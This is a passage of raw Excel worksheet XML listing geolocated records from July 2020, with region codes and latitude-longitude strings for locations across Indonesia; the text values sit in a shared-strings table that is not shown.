        <v>6532</v>
      </c>
      <c r="T2222" t="s">
        <v>42</v>
      </c>
      <c r="U2222" s="5">
        <v>10855988</v>
      </c>
      <c r="V2222" s="5" t="s">
        <v>16431</v>
      </c>
      <c r="W2222" s="5">
        <v>-672671</v>
      </c>
      <c r="X2222" t="s">
        <v>20178</v>
      </c>
      <c r="Y2222" t="str">
        <f t="shared" si="34"/>
        <v>-6.72671,108.55988</v>
      </c>
    </row>
    <row r="2223" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2223">
        <v>193547</v>
      </c>
      <c r="B2223" s="1">
        <v>44015</v>
      </c>
      <c r="C2223" s="2">
        <v>5.486111111111111E-2</v>
      </c>
      <c r="D2223" t="s">
        <v>2648</v>
      </c>
      <c r="E2223" t="s">
        <v>23</v>
      </c>
      <c r="G2223" t="s">
        <v>7470</v>
      </c>
      <c r="H2223" t="s">
        <v>26</v>
      </c>
      <c r="J2223" t="s">
        <v>6444</v>
      </c>
      <c r="L2223" t="s">
        <v>7471</v>
      </c>
      <c r="M2223">
        <v>3175030001</v>
      </c>
      <c r="N2223">
        <v>3175030</v>
      </c>
      <c r="O2223">
        <v>3175</v>
      </c>
      <c r="P2223">
        <v>31</v>
      </c>
      <c r="Q2223" t="s">
        <v>1574</v>
      </c>
      <c r="R2223" t="s">
        <v>1563</v>
      </c>
      <c r="S2223" t="s">
        <v>547</v>
      </c>
      <c r="T2223" t="s">
        <v>33</v>
      </c>
      <c r="U2223" s="5">
        <v>10685274</v>
      </c>
      <c r="V2223" s="5" t="s">
        <v>16432</v>
      </c>
      <c r="W2223" s="5">
        <v>-613628</v>
      </c>
      <c r="X2223" t="s">
        <v>20179</v>
      </c>
      <c r="Y2223" t="str">
        <f t="shared" si="34"/>
        <v>-6.13628,106.85274</v>
      </c>
    </row>
    <row r="2224" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2224">
        <v>193591</v>
      </c>
      <c r="B2224" s="1">
        <v>44015</v>
      </c>
      <c r="C2224" s="2">
        <v>0.13048611111111111</v>
      </c>
      <c r="D2224" t="s">
        <v>22</v>
      </c>
      <c r="E2224" t="s">
        <v>23</v>
      </c>
      <c r="F2224" t="s">
        <v>7472</v>
      </c>
      <c r="G2224" t="s">
        <v>7473</v>
      </c>
      <c r="H2224" t="s">
        <v>26</v>
      </c>
      <c r="I2224" t="s">
        <v>137</v>
      </c>
      <c r="J2224" t="s">
        <v>7171</v>
      </c>
      <c r="M2224">
        <v>6471010006</v>
      </c>
      <c r="N2224">
        <v>6471010</v>
      </c>
      <c r="O2224">
        <v>6471</v>
      </c>
      <c r="P2224">
        <v>64</v>
      </c>
      <c r="Q2224" t="s">
        <v>7474</v>
      </c>
      <c r="R2224" t="s">
        <v>1306</v>
      </c>
      <c r="S2224" t="s">
        <v>1307</v>
      </c>
      <c r="T2224" t="s">
        <v>1308</v>
      </c>
      <c r="U2224" s="5">
        <v>11687466</v>
      </c>
      <c r="V2224" s="5" t="s">
        <v>16433</v>
      </c>
      <c r="W2224" s="5">
        <v>-123565</v>
      </c>
      <c r="X2224" t="s">
        <v>20180</v>
      </c>
      <c r="Y2224" t="str">
        <f t="shared" si="34"/>
        <v>-1.23565,116.87466</v>
      </c>
    </row>
    <row r="2225" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2225">
        <v>193807</v>
      </c>
      <c r="B2225" s="1">
        <v>44016</v>
      </c>
      <c r="C2225" s="2">
        <v>0.19952546296296295</v>
      </c>
      <c r="D2225" t="s">
        <v>22</v>
      </c>
      <c r="E2225" t="s">
        <v>23</v>
      </c>
      <c r="F2225" t="s">
        <v>7475</v>
      </c>
      <c r="G2225" t="s">
        <v>7476</v>
      </c>
      <c r="H2225" t="s">
        <v>26</v>
      </c>
      <c r="I2225" t="s">
        <v>7477</v>
      </c>
      <c r="J2225" t="s">
        <v>6498</v>
      </c>
      <c r="M2225">
        <v>7571022003</v>
      </c>
      <c r="N2225">
        <v>7571022</v>
      </c>
      <c r="O2225">
        <v>7571</v>
      </c>
      <c r="P2225">
        <v>75</v>
      </c>
      <c r="Q2225" t="s">
        <v>7478</v>
      </c>
      <c r="R2225" t="s">
        <v>7479</v>
      </c>
      <c r="S2225" t="s">
        <v>6501</v>
      </c>
      <c r="T2225" t="s">
        <v>6501</v>
      </c>
      <c r="U2225" s="5">
        <v>12306034</v>
      </c>
      <c r="V2225" s="5" t="s">
        <v>16434</v>
      </c>
      <c r="W2225" s="5">
        <v>52513</v>
      </c>
      <c r="X2225" t="s">
        <v>14442</v>
      </c>
      <c r="Y2225" t="str">
        <f t="shared" si="34"/>
        <v>0.52513,123.06034</v>
      </c>
    </row>
    <row r="2226" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2226">
        <v>193808</v>
      </c>
      <c r="B2226" s="1">
        <v>44016</v>
      </c>
      <c r="C2226" s="2">
        <v>0.80259259259259252</v>
      </c>
      <c r="D2226" t="s">
        <v>22</v>
      </c>
      <c r="E2226" t="s">
        <v>23</v>
      </c>
      <c r="F2226" t="s">
        <v>7480</v>
      </c>
      <c r="H2226" t="s">
        <v>7086</v>
      </c>
      <c r="I2226" t="s">
        <v>7414</v>
      </c>
      <c r="J2226" t="s">
        <v>2615</v>
      </c>
      <c r="L2226" t="s">
        <v>7481</v>
      </c>
      <c r="M2226">
        <v>3404120005</v>
      </c>
      <c r="N2226">
        <v>3404120</v>
      </c>
      <c r="O2226">
        <v>3404</v>
      </c>
      <c r="P2226">
        <v>34</v>
      </c>
      <c r="Q2226" t="s">
        <v>7482</v>
      </c>
      <c r="R2226" t="s">
        <v>6506</v>
      </c>
      <c r="S2226" t="s">
        <v>1855</v>
      </c>
      <c r="T2226" t="s">
        <v>1856</v>
      </c>
      <c r="U2226" s="5">
        <v>11041686</v>
      </c>
      <c r="V2226" s="5" t="s">
        <v>16435</v>
      </c>
      <c r="W2226" s="5">
        <v>-769738</v>
      </c>
      <c r="X2226" t="s">
        <v>20181</v>
      </c>
      <c r="Y2226" t="str">
        <f t="shared" si="34"/>
        <v>-7.69738,110.41686</v>
      </c>
    </row>
    <row r="2227" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2227">
        <v>193881</v>
      </c>
      <c r="B2227" s="1">
        <v>44018</v>
      </c>
      <c r="C2227" s="2">
        <v>0.1057523148148148</v>
      </c>
      <c r="D2227" t="s">
        <v>22</v>
      </c>
      <c r="E2227" t="s">
        <v>23</v>
      </c>
      <c r="F2227" t="s">
        <v>7483</v>
      </c>
      <c r="G2227" t="s">
        <v>7484</v>
      </c>
      <c r="H2227" t="s">
        <v>26</v>
      </c>
      <c r="I2227" t="s">
        <v>511</v>
      </c>
      <c r="J2227" t="s">
        <v>1656</v>
      </c>
      <c r="L2227" t="s">
        <v>7485</v>
      </c>
      <c r="M2227">
        <v>3173080003</v>
      </c>
      <c r="N2227">
        <v>3173080</v>
      </c>
      <c r="O2227">
        <v>3173</v>
      </c>
      <c r="P2227">
        <v>31</v>
      </c>
      <c r="Q2227" t="s">
        <v>157</v>
      </c>
      <c r="R2227" t="s">
        <v>157</v>
      </c>
      <c r="S2227" t="s">
        <v>62</v>
      </c>
      <c r="T2227" t="s">
        <v>33</v>
      </c>
      <c r="U2227" s="5">
        <v>10682715</v>
      </c>
      <c r="V2227" s="5" t="s">
        <v>16381</v>
      </c>
      <c r="W2227" s="5">
        <v>-617539</v>
      </c>
      <c r="X2227" t="s">
        <v>19329</v>
      </c>
      <c r="Y2227" t="str">
        <f t="shared" si="34"/>
        <v>-6.17539,106.82715</v>
      </c>
    </row>
    <row r="2228" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2228">
        <v>193884</v>
      </c>
      <c r="B2228" s="1">
        <v>44018</v>
      </c>
      <c r="C2228" s="2">
        <v>0.38525462962962959</v>
      </c>
      <c r="D2228" t="s">
        <v>22</v>
      </c>
      <c r="E2228" t="s">
        <v>23</v>
      </c>
      <c r="F2228" t="s">
        <v>7486</v>
      </c>
      <c r="H2228" t="s">
        <v>26</v>
      </c>
      <c r="I2228" t="s">
        <v>7487</v>
      </c>
      <c r="J2228" t="s">
        <v>37</v>
      </c>
      <c r="L2228" t="s">
        <v>7488</v>
      </c>
      <c r="M2228">
        <v>3175010005</v>
      </c>
      <c r="N2228">
        <v>3175010</v>
      </c>
      <c r="O2228">
        <v>3175</v>
      </c>
      <c r="P2228">
        <v>31</v>
      </c>
      <c r="Q2228" t="s">
        <v>1686</v>
      </c>
      <c r="R2228" t="s">
        <v>546</v>
      </c>
      <c r="S2228" t="s">
        <v>547</v>
      </c>
      <c r="T2228" t="s">
        <v>33</v>
      </c>
      <c r="U2228" s="5">
        <v>10679983</v>
      </c>
      <c r="V2228" s="5" t="s">
        <v>16436</v>
      </c>
      <c r="W2228" s="5">
        <v>-611734</v>
      </c>
      <c r="X2228" t="s">
        <v>20182</v>
      </c>
      <c r="Y2228" t="str">
        <f t="shared" si="34"/>
        <v>-6.11734,106.79983</v>
      </c>
    </row>
    <row r="2229" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2229">
        <v>193886</v>
      </c>
      <c r="B2229" s="1">
        <v>44018</v>
      </c>
      <c r="C2229" s="2">
        <v>0.98953703703703699</v>
      </c>
      <c r="D2229" t="s">
        <v>22</v>
      </c>
      <c r="E2229" t="s">
        <v>23</v>
      </c>
      <c r="F2229" t="s">
        <v>7489</v>
      </c>
      <c r="H2229" t="s">
        <v>7086</v>
      </c>
      <c r="I2229" t="s">
        <v>7490</v>
      </c>
      <c r="J2229" t="s">
        <v>2608</v>
      </c>
      <c r="L2229" t="s">
        <v>7491</v>
      </c>
      <c r="M2229">
        <v>3305140004</v>
      </c>
      <c r="N2229">
        <v>3305140</v>
      </c>
      <c r="O2229">
        <v>3305</v>
      </c>
      <c r="P2229">
        <v>33</v>
      </c>
      <c r="Q2229" t="s">
        <v>7492</v>
      </c>
      <c r="R2229" t="s">
        <v>7493</v>
      </c>
      <c r="S2229" t="s">
        <v>7494</v>
      </c>
      <c r="T2229" t="s">
        <v>1134</v>
      </c>
      <c r="U2229" s="5">
        <v>10961039</v>
      </c>
      <c r="V2229" s="5" t="s">
        <v>16437</v>
      </c>
      <c r="W2229" s="5">
        <v>-767457</v>
      </c>
      <c r="X2229" t="s">
        <v>20183</v>
      </c>
      <c r="Y2229" t="str">
        <f t="shared" si="34"/>
        <v>-7.67457,109.61039</v>
      </c>
    </row>
    <row r="2230" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2230">
        <v>193887</v>
      </c>
      <c r="B2230" s="1">
        <v>44018</v>
      </c>
      <c r="C2230" s="2">
        <v>0.99045138888888884</v>
      </c>
      <c r="D2230" t="s">
        <v>22</v>
      </c>
      <c r="E2230" t="s">
        <v>23</v>
      </c>
      <c r="F2230" t="s">
        <v>7495</v>
      </c>
      <c r="H2230" t="s">
        <v>7086</v>
      </c>
      <c r="I2230" t="s">
        <v>7496</v>
      </c>
      <c r="J2230" t="s">
        <v>2608</v>
      </c>
      <c r="L2230" t="s">
        <v>7497</v>
      </c>
      <c r="M2230">
        <v>3305140004</v>
      </c>
      <c r="N2230">
        <v>3305140</v>
      </c>
      <c r="O2230">
        <v>3305</v>
      </c>
      <c r="P2230">
        <v>33</v>
      </c>
      <c r="Q2230" t="s">
        <v>7492</v>
      </c>
      <c r="R2230" t="s">
        <v>7493</v>
      </c>
      <c r="S2230" t="s">
        <v>7494</v>
      </c>
      <c r="T2230" t="s">
        <v>1134</v>
      </c>
      <c r="U2230" s="5">
        <v>10961062</v>
      </c>
      <c r="V2230" s="5" t="s">
        <v>16438</v>
      </c>
      <c r="W2230" s="5">
        <v>-767471</v>
      </c>
      <c r="X2230" t="s">
        <v>20184</v>
      </c>
      <c r="Y2230" t="str">
        <f t="shared" si="34"/>
        <v>-7.67471,109.61062</v>
      </c>
    </row>
    <row r="2231" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2231">
        <v>193888</v>
      </c>
      <c r="B2231" s="1">
        <v>44019</v>
      </c>
      <c r="C2231" s="2">
        <v>0.2107175925925926</v>
      </c>
      <c r="D2231" t="s">
        <v>22</v>
      </c>
      <c r="E2231" t="s">
        <v>23</v>
      </c>
      <c r="F2231" t="s">
        <v>7498</v>
      </c>
      <c r="H2231" t="s">
        <v>7086</v>
      </c>
      <c r="I2231" t="s">
        <v>7499</v>
      </c>
      <c r="J2231" t="s">
        <v>2608</v>
      </c>
      <c r="L2231" t="s">
        <v>7500</v>
      </c>
      <c r="M2231">
        <v>3312220011</v>
      </c>
      <c r="N2231">
        <v>3312220</v>
      </c>
      <c r="O2231">
        <v>3312</v>
      </c>
      <c r="P2231">
        <v>33</v>
      </c>
      <c r="Q2231" t="s">
        <v>7501</v>
      </c>
      <c r="R2231" t="s">
        <v>7502</v>
      </c>
      <c r="S2231" t="s">
        <v>7418</v>
      </c>
      <c r="T2231" t="s">
        <v>1134</v>
      </c>
      <c r="U2231" s="5">
        <v>11112787</v>
      </c>
      <c r="V2231" s="5" t="s">
        <v>16439</v>
      </c>
      <c r="W2231" s="5">
        <v>-782802</v>
      </c>
      <c r="X2231" t="s">
        <v>20185</v>
      </c>
      <c r="Y2231" t="str">
        <f t="shared" si="34"/>
        <v>-7.82802,111.12787</v>
      </c>
    </row>
    <row r="2232" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2232">
        <v>193889</v>
      </c>
      <c r="B2232" s="1">
        <v>44019</v>
      </c>
      <c r="C2232" s="2">
        <v>0.3440509259259259</v>
      </c>
      <c r="D2232" t="s">
        <v>22</v>
      </c>
      <c r="E2232" t="s">
        <v>23</v>
      </c>
      <c r="F2232" t="s">
        <v>7503</v>
      </c>
      <c r="H2232" t="s">
        <v>26</v>
      </c>
      <c r="I2232" t="s">
        <v>7285</v>
      </c>
      <c r="J2232" t="s">
        <v>2608</v>
      </c>
      <c r="L2232" t="s">
        <v>7504</v>
      </c>
      <c r="M2232">
        <v>3308060008</v>
      </c>
      <c r="N2232">
        <v>3308060</v>
      </c>
      <c r="O2232">
        <v>3308</v>
      </c>
      <c r="P2232">
        <v>33</v>
      </c>
      <c r="Q2232" t="s">
        <v>7505</v>
      </c>
      <c r="R2232" t="s">
        <v>7505</v>
      </c>
      <c r="S2232" t="s">
        <v>1907</v>
      </c>
      <c r="T2232" t="s">
        <v>1134</v>
      </c>
      <c r="U2232" s="5">
        <v>11033500</v>
      </c>
      <c r="V2232" s="5" t="s">
        <v>16440</v>
      </c>
      <c r="W2232" s="5">
        <v>-755382</v>
      </c>
      <c r="X2232" t="s">
        <v>20186</v>
      </c>
      <c r="Y2232" t="str">
        <f t="shared" si="34"/>
        <v>-7.55382,110.33500</v>
      </c>
    </row>
    <row r="2233" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2233">
        <v>193890</v>
      </c>
      <c r="B2233" s="1">
        <v>44020</v>
      </c>
      <c r="C2233" s="2">
        <v>0.46576388888888887</v>
      </c>
      <c r="D2233" t="s">
        <v>22</v>
      </c>
      <c r="E2233" t="s">
        <v>23</v>
      </c>
      <c r="F2233" t="s">
        <v>7506</v>
      </c>
      <c r="G2233" t="s">
        <v>7507</v>
      </c>
      <c r="H2233" t="s">
        <v>26</v>
      </c>
      <c r="I2233" t="s">
        <v>7508</v>
      </c>
      <c r="J2233" t="s">
        <v>7509</v>
      </c>
      <c r="L2233" t="s">
        <v>7510</v>
      </c>
      <c r="M2233">
        <v>1371110008</v>
      </c>
      <c r="N2233">
        <v>1371110</v>
      </c>
      <c r="O2233">
        <v>1371</v>
      </c>
      <c r="P2233">
        <v>13</v>
      </c>
      <c r="Q2233" t="s">
        <v>7511</v>
      </c>
      <c r="R2233" t="s">
        <v>7512</v>
      </c>
      <c r="S2233" t="s">
        <v>7513</v>
      </c>
      <c r="T2233" t="s">
        <v>7514</v>
      </c>
      <c r="U2233" s="5">
        <v>10034971</v>
      </c>
      <c r="V2233" s="5" t="s">
        <v>16441</v>
      </c>
      <c r="W2233" s="5">
        <v>-88981</v>
      </c>
      <c r="X2233" t="s">
        <v>20187</v>
      </c>
      <c r="Y2233" t="str">
        <f t="shared" si="34"/>
        <v xml:space="preserve"> -0.88981,100.34971</v>
      </c>
    </row>
    <row r="2234" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2234">
        <v>193891</v>
      </c>
      <c r="B2234" s="1">
        <v>44020</v>
      </c>
      <c r="C2234" s="2">
        <v>0.47513888888888883</v>
      </c>
      <c r="D2234" t="s">
        <v>22</v>
      </c>
      <c r="E2234" t="s">
        <v>23</v>
      </c>
      <c r="F2234" t="s">
        <v>7515</v>
      </c>
      <c r="H2234" t="s">
        <v>26</v>
      </c>
      <c r="I2234" t="s">
        <v>753</v>
      </c>
      <c r="J2234" t="s">
        <v>7509</v>
      </c>
      <c r="L2234" t="s">
        <v>7516</v>
      </c>
      <c r="M2234">
        <v>1371070012</v>
      </c>
      <c r="N2234">
        <v>1371070</v>
      </c>
      <c r="O2234">
        <v>1371</v>
      </c>
      <c r="P2234">
        <v>13</v>
      </c>
      <c r="Q2234" t="s">
        <v>7517</v>
      </c>
      <c r="R2234" t="s">
        <v>7518</v>
      </c>
      <c r="S2234" t="s">
        <v>7513</v>
      </c>
      <c r="T2234" t="s">
        <v>7514</v>
      </c>
      <c r="U2234" s="5">
        <v>10035057</v>
      </c>
      <c r="V2234" s="5" t="s">
        <v>16442</v>
      </c>
      <c r="W2234" s="5">
        <v>-90828</v>
      </c>
      <c r="X2234" t="s">
        <v>20188</v>
      </c>
      <c r="Y2234" t="str">
        <f t="shared" si="34"/>
        <v xml:space="preserve"> -0.90828,100.35057</v>
      </c>
    </row>
    <row r="2235" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2235">
        <v>193892</v>
      </c>
      <c r="B2235" s="1">
        <v>44020</v>
      </c>
      <c r="C2235" s="2">
        <v>0.51092592592592589</v>
      </c>
      <c r="D2235" t="s">
        <v>22</v>
      </c>
      <c r="E2235" t="s">
        <v>23</v>
      </c>
      <c r="F2235" t="s">
        <v>7519</v>
      </c>
      <c r="G2235" t="s">
        <v>7520</v>
      </c>
      <c r="H2235" t="s">
        <v>26</v>
      </c>
      <c r="I2235" t="s">
        <v>290</v>
      </c>
      <c r="J2235" t="s">
        <v>7509</v>
      </c>
      <c r="L2235" t="s">
        <v>7521</v>
      </c>
      <c r="M2235">
        <v>1371070018</v>
      </c>
      <c r="N2235">
        <v>1371070</v>
      </c>
      <c r="O2235">
        <v>1371</v>
      </c>
      <c r="P2235">
        <v>13</v>
      </c>
      <c r="Q2235" t="s">
        <v>7522</v>
      </c>
      <c r="R2235" t="s">
        <v>7518</v>
      </c>
      <c r="S2235" t="s">
        <v>7513</v>
      </c>
      <c r="T2235" t="s">
        <v>7514</v>
      </c>
      <c r="U2235" s="5">
        <v>10035009</v>
      </c>
      <c r="V2235" s="5" t="s">
        <v>16443</v>
      </c>
      <c r="W2235" s="5">
        <v>-89552</v>
      </c>
      <c r="X2235" t="s">
        <v>20189</v>
      </c>
      <c r="Y2235" t="str">
        <f t="shared" si="34"/>
        <v xml:space="preserve"> -0.89552,100.35009</v>
      </c>
    </row>
    <row r="2236" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2236">
        <v>193893</v>
      </c>
      <c r="B2236" s="1">
        <v>44020</v>
      </c>
      <c r="C2236" s="2">
        <v>0.51459490740740743</v>
      </c>
      <c r="D2236" t="s">
        <v>22</v>
      </c>
      <c r="E2236" t="s">
        <v>23</v>
      </c>
      <c r="F2236" t="s">
        <v>7523</v>
      </c>
      <c r="G2236" t="s">
        <v>7524</v>
      </c>
      <c r="H2236" t="s">
        <v>26</v>
      </c>
      <c r="I2236" t="s">
        <v>1513</v>
      </c>
      <c r="J2236" t="s">
        <v>7509</v>
      </c>
      <c r="L2236" t="s">
        <v>7525</v>
      </c>
      <c r="M2236">
        <v>1371030029</v>
      </c>
      <c r="N2236">
        <v>1371030</v>
      </c>
      <c r="O2236">
        <v>1371</v>
      </c>
      <c r="P2236">
        <v>13</v>
      </c>
      <c r="Q2236" t="s">
        <v>7526</v>
      </c>
      <c r="R2236" t="s">
        <v>7527</v>
      </c>
      <c r="S2236" t="s">
        <v>7513</v>
      </c>
      <c r="T2236" t="s">
        <v>7514</v>
      </c>
      <c r="U2236" s="5">
        <v>10040180</v>
      </c>
      <c r="V2236" s="5" t="s">
        <v>16444</v>
      </c>
      <c r="W2236" s="5">
        <v>-96908</v>
      </c>
      <c r="X2236" t="s">
        <v>20190</v>
      </c>
      <c r="Y2236" t="str">
        <f t="shared" si="34"/>
        <v xml:space="preserve"> -0.96908,100.40180</v>
      </c>
    </row>
    <row r="2237" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2237">
        <v>193894</v>
      </c>
      <c r="B2237" s="1">
        <v>44020</v>
      </c>
      <c r="C2237" s="2">
        <v>0.51687499999999997</v>
      </c>
      <c r="D2237" t="s">
        <v>22</v>
      </c>
      <c r="E2237" t="s">
        <v>23</v>
      </c>
      <c r="F2237" t="s">
        <v>7528</v>
      </c>
      <c r="G2237" t="s">
        <v>7529</v>
      </c>
      <c r="H2237" t="s">
        <v>26</v>
      </c>
      <c r="I2237" t="s">
        <v>4595</v>
      </c>
      <c r="J2237" t="s">
        <v>7509</v>
      </c>
      <c r="L2237" t="s">
        <v>7530</v>
      </c>
      <c r="M2237">
        <v>1371080005</v>
      </c>
      <c r="N2237">
        <v>1371080</v>
      </c>
      <c r="O2237">
        <v>1371</v>
      </c>
      <c r="P2237">
        <v>13</v>
      </c>
      <c r="Q2237" t="s">
        <v>7531</v>
      </c>
      <c r="R2237" t="s">
        <v>7532</v>
      </c>
      <c r="S2237" t="s">
        <v>7513</v>
      </c>
      <c r="T2237" t="s">
        <v>7514</v>
      </c>
      <c r="U2237" s="5">
        <v>10035530</v>
      </c>
      <c r="V2237" s="5" t="s">
        <v>16445</v>
      </c>
      <c r="W2237" s="5">
        <v>-90668</v>
      </c>
      <c r="X2237" t="s">
        <v>20191</v>
      </c>
      <c r="Y2237" t="str">
        <f t="shared" si="34"/>
        <v xml:space="preserve"> -0.90668,100.35530</v>
      </c>
    </row>
    <row r="2238" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2238">
        <v>193897</v>
      </c>
      <c r="B2238" s="1">
        <v>44023</v>
      </c>
      <c r="C2238" s="2">
        <v>0.67608796296296303</v>
      </c>
      <c r="D2238" t="s">
        <v>22</v>
      </c>
      <c r="E2238" t="s">
        <v>23</v>
      </c>
      <c r="F2238" t="s">
        <v>7533</v>
      </c>
      <c r="G2238" t="s">
        <v>7534</v>
      </c>
      <c r="H2238" t="s">
        <v>26</v>
      </c>
      <c r="I2238" t="s">
        <v>5353</v>
      </c>
      <c r="J2238" t="s">
        <v>6509</v>
      </c>
      <c r="L2238" t="s">
        <v>7535</v>
      </c>
      <c r="M2238">
        <v>6301060016</v>
      </c>
      <c r="N2238">
        <v>6301060</v>
      </c>
      <c r="O2238">
        <v>6301</v>
      </c>
      <c r="P2238">
        <v>63</v>
      </c>
      <c r="Q2238" t="s">
        <v>7536</v>
      </c>
      <c r="R2238" t="s">
        <v>7536</v>
      </c>
      <c r="S2238" t="s">
        <v>7537</v>
      </c>
      <c r="T2238" t="s">
        <v>6513</v>
      </c>
      <c r="U2238" s="5">
        <v>11477710</v>
      </c>
      <c r="V2238" s="5" t="s">
        <v>16446</v>
      </c>
      <c r="W2238" s="5">
        <v>-381007</v>
      </c>
      <c r="X2238" t="s">
        <v>20192</v>
      </c>
      <c r="Y2238" t="str">
        <f t="shared" si="34"/>
        <v>-3.81007,114.77710</v>
      </c>
    </row>
    <row r="2239" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2239">
        <v>193898</v>
      </c>
      <c r="B2239" s="1">
        <v>44024</v>
      </c>
      <c r="C2239" s="2">
        <v>0.67980324074074072</v>
      </c>
      <c r="D2239" t="s">
        <v>22</v>
      </c>
      <c r="E2239" t="s">
        <v>23</v>
      </c>
      <c r="F2239" t="s">
        <v>7538</v>
      </c>
      <c r="H2239" t="s">
        <v>26</v>
      </c>
      <c r="I2239" t="s">
        <v>666</v>
      </c>
      <c r="J2239" t="s">
        <v>6626</v>
      </c>
      <c r="L2239" t="s">
        <v>7539</v>
      </c>
      <c r="M2239">
        <v>7322120023</v>
      </c>
      <c r="N2239">
        <v>7322120</v>
      </c>
      <c r="O2239">
        <v>7322</v>
      </c>
      <c r="P2239">
        <v>73</v>
      </c>
      <c r="Q2239" t="s">
        <v>7540</v>
      </c>
      <c r="R2239" t="s">
        <v>7541</v>
      </c>
      <c r="S2239" t="s">
        <v>7542</v>
      </c>
      <c r="T2239" t="s">
        <v>6630</v>
      </c>
      <c r="U2239" s="5">
        <v>12033080</v>
      </c>
      <c r="V2239" s="5" t="s">
        <v>16447</v>
      </c>
      <c r="W2239" s="5">
        <v>-255216</v>
      </c>
      <c r="X2239" t="s">
        <v>20193</v>
      </c>
      <c r="Y2239" t="str">
        <f t="shared" si="34"/>
        <v>-2.55216,120.33080</v>
      </c>
    </row>
    <row r="2240" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2240">
        <v>193903</v>
      </c>
      <c r="B2240" s="1">
        <v>44025</v>
      </c>
      <c r="C2240" s="2">
        <v>0.81312499999999999</v>
      </c>
      <c r="D2240" t="s">
        <v>22</v>
      </c>
      <c r="E2240" t="s">
        <v>23</v>
      </c>
      <c r="F2240" t="s">
        <v>7543</v>
      </c>
      <c r="H2240" t="s">
        <v>26</v>
      </c>
      <c r="I2240" t="s">
        <v>2016</v>
      </c>
      <c r="J2240" t="s">
        <v>3013</v>
      </c>
      <c r="L2240" t="s">
        <v>7544</v>
      </c>
      <c r="M2240">
        <v>1671060007</v>
      </c>
      <c r="N2240">
        <v>1671060</v>
      </c>
      <c r="O2240">
        <v>1671</v>
      </c>
      <c r="P2240">
        <v>16</v>
      </c>
      <c r="Q2240" t="s">
        <v>7545</v>
      </c>
      <c r="R2240" t="s">
        <v>7546</v>
      </c>
      <c r="S2240" t="s">
        <v>7547</v>
      </c>
      <c r="T2240" t="s">
        <v>1418</v>
      </c>
      <c r="U2240" s="5">
        <v>10478764</v>
      </c>
      <c r="V2240" s="5" t="s">
        <v>16448</v>
      </c>
      <c r="W2240" s="5">
        <v>-297028</v>
      </c>
      <c r="X2240" t="s">
        <v>20194</v>
      </c>
      <c r="Y2240" t="str">
        <f t="shared" si="34"/>
        <v>-2.97028,104.78764</v>
      </c>
    </row>
    <row r="2241" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2241">
        <v>193904</v>
      </c>
      <c r="B2241" s="1">
        <v>44026</v>
      </c>
      <c r="C2241" s="2">
        <v>1.6307870370370372E-2</v>
      </c>
      <c r="D2241" t="s">
        <v>22</v>
      </c>
      <c r="E2241" t="s">
        <v>23</v>
      </c>
      <c r="F2241" t="s">
        <v>7548</v>
      </c>
      <c r="G2241" t="s">
        <v>7549</v>
      </c>
      <c r="H2241" t="s">
        <v>26</v>
      </c>
      <c r="I2241" t="s">
        <v>6353</v>
      </c>
      <c r="J2241" t="s">
        <v>6626</v>
      </c>
      <c r="L2241" t="s">
        <v>7550</v>
      </c>
      <c r="M2241">
        <v>7322120020</v>
      </c>
      <c r="N2241">
        <v>7322120</v>
      </c>
      <c r="O2241">
        <v>7322</v>
      </c>
      <c r="P2241">
        <v>73</v>
      </c>
      <c r="Q2241" t="s">
        <v>7551</v>
      </c>
      <c r="R2241" t="s">
        <v>7541</v>
      </c>
      <c r="S2241" t="s">
        <v>7542</v>
      </c>
      <c r="T2241" t="s">
        <v>6630</v>
      </c>
      <c r="U2241" s="5">
        <v>12032547</v>
      </c>
      <c r="V2241" s="5" t="s">
        <v>16449</v>
      </c>
      <c r="W2241" s="5">
        <v>-255221</v>
      </c>
      <c r="X2241" t="s">
        <v>20195</v>
      </c>
      <c r="Y2241" t="str">
        <f t="shared" si="34"/>
        <v>-2.55221,120.32547</v>
      </c>
    </row>
    <row r="2242" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2242">
        <v>193905</v>
      </c>
      <c r="B2242" s="1">
        <v>44026</v>
      </c>
      <c r="C2242" s="2">
        <v>6.5358796296296304E-2</v>
      </c>
      <c r="D2242" t="s">
        <v>22</v>
      </c>
      <c r="E2242" t="s">
        <v>23</v>
      </c>
      <c r="F2242" t="s">
        <v>7552</v>
      </c>
      <c r="H2242" t="s">
        <v>26</v>
      </c>
      <c r="I2242" t="s">
        <v>979</v>
      </c>
      <c r="J2242" t="s">
        <v>6626</v>
      </c>
      <c r="L2242" t="s">
        <v>7553</v>
      </c>
      <c r="M2242">
        <v>7322020018</v>
      </c>
      <c r="N2242">
        <v>7322020</v>
      </c>
      <c r="O2242">
        <v>7322</v>
      </c>
      <c r="P2242">
        <v>73</v>
      </c>
      <c r="Q2242" t="s">
        <v>7554</v>
      </c>
      <c r="R2242" t="s">
        <v>7554</v>
      </c>
      <c r="S2242" t="s">
        <v>7542</v>
      </c>
      <c r="T2242" t="s">
        <v>6630</v>
      </c>
      <c r="U2242" s="5">
        <v>12025606</v>
      </c>
      <c r="V2242" s="5" t="s">
        <v>16450</v>
      </c>
      <c r="W2242" s="5">
        <v>-259532</v>
      </c>
      <c r="X2242" t="s">
        <v>20196</v>
      </c>
      <c r="Y2242" t="str">
        <f t="shared" si="34"/>
        <v>-2.59532,120.25606</v>
      </c>
    </row>
    <row r="2243" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2243">
        <v>193906</v>
      </c>
      <c r="B2243" s="1">
        <v>44026</v>
      </c>
      <c r="C2243" s="2">
        <v>0.22416666666666665</v>
      </c>
      <c r="D2243" t="s">
        <v>22</v>
      </c>
      <c r="E2243" t="s">
        <v>23</v>
      </c>
